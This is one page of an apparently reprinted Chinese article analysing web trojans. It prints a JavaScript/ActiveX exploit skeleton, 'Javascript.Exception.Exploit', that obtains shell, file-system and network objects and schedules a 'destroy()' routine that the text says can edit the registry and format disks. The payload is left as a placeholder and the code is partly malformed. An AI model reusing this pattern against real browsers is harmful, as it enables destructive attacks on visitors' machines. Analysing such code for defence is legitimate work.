今日精选 ·绝对解密 XP系统中隐藏的10个秘密 ·Windows系统文件详解【大全】 ·配置Windows Server 2008高级防火墙 ·带你现场体验专业服务器机房 ·屏蔽五项功能 让Windows XP极速狂飙 ·木马免杀技术大盘点 ·如何让无线路由信号更强更广 ·各大路由器默认密码(完美汇总经典版) ·如何构建安全的入侵检测系统 ·电脑故障维修判断指导大全(联想内部文件) >>>>
编程开发  Java | .Net | C/C++ | Delphi | VC/VB | XML | ASP | PHP
数据库  Oracle | Mysql | DB2 | Sql server
应用方案 无线网络方案 | 有线网络方案 

网管天地  网吧管理 | 路由器 | 交换机 | 服务器
网络安全  黑客技术 | 病毒漏洞 | 网站安全 | 服务器安全 | 入侵防御 | 防火墙
操作系统 Linux/Unix | Windows 
您现在的位置: 企业网络安全 >> 文章·资讯 >> 互联网安全 >> 网站安全 >> 文章正文
国内资深黑客详谈网页木马
作者:子明 文章来源:51CTO.com 点击数: 更新时间:2008-5-20 10:57:47

 

六、常用网页木马运行原理的分析

  1.Javascript.Exception.Exploit

  常用的攻击代码:

  

      Function destroy(){
  try
  {
  //ActiveX initialization 初始化ActiveX,为修改注册表做准备
  a1=document.applets[0];
  //获取applet运行对象,以下语句指向注册表中有关IE的表项
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
  a1.createInstance();
  Shl = a1.GetObject();
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
  a1.createInstance();
  FSO = a1.GetObject();
  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
  a1.createInstance();
  Net = a1.GetObject();
  try
  {
  开始进行破坏
  }
  }
  catch(e)
  {}
  }
  catch(e)
  {}
  }
  function do()
  {
  //初始化函数,并每隔一秒执行修改程序
  setTimeout("destroy()", 1000); //设定运行时间1秒
  }
  Do() //进行破坏的执行函数指令
  这个代码是JAVAScript编写,很简单,但却可以修改受影响系统的注册表,释放垃圾文件,格式化硬盘等。

上一页  [1] [2] [3] [4] [5] [6] [7] [8] 下一页


免责声明:作品版权归所属媒体与作者所有!!本站刊载此文不代表同意其说法或描述,仅为提供更多信息。如果您认为我们侵犯了您的版权,请告知!本站立即删除。有异议请联系我们。
文章录入:security    责任编辑:security 
  • 上一篇文章:
  • 下一篇文章: 没有了
    • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 网站公告 |